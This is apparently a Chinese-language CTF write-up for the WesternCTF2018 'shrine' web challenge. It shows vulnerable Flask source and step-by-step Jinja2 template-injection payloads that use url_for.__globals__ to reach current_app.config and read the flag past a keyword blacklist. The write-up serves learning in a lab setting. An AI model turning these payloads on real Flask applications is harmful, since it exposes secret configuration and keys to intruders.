[WesternCTF2018] web题-shrine

开题即送源码一份

import flask 
import os 
app = flask.Flask(__name__) 
app.config['FLAG'] = os.environ.pop('FLAG')  # 有一个名为flag的config
@app.route('/') 
def index(): 
    return open(__file__).read() 
@app.route('/shrine/')  # 路径
def shrine(shrine): 
    def safe_jinja(s): 
        s = s.replace('(', '').replace(')', '') 
        blacklist = ['config', 'self']  # 黑名单
        return ''.join(['{
     {% set {}=None%}}'.format(c) for c in blacklist]) + s  # 遍历黑名单将结果为空
    return flask.render_template_string(safe_jinja(shrine)) 
if __name__ == '__main__': 
    app.run(debug=True) 

这是一个ssti模板注入的题
访问shrine进行测试是否有漏洞

/shrine/{
     {
     1+1}}

本来可以直接读取这个config，但是他这里设置了黑名单。可以使用函数url_for，其作用是用于构建指定函数的URL，在配合globals()，该函数会以字典类型返回当前位置的全部全局变量。

/shrine/{
     {
     url_for.__globals__}}

找到这个current_app’: 这里的current就是指的当前的app，只要能查看到这个的config不就可以看到flag了，那么构造payload

/shrine/{
     {
     url_for.__globals__['current_app'].config}}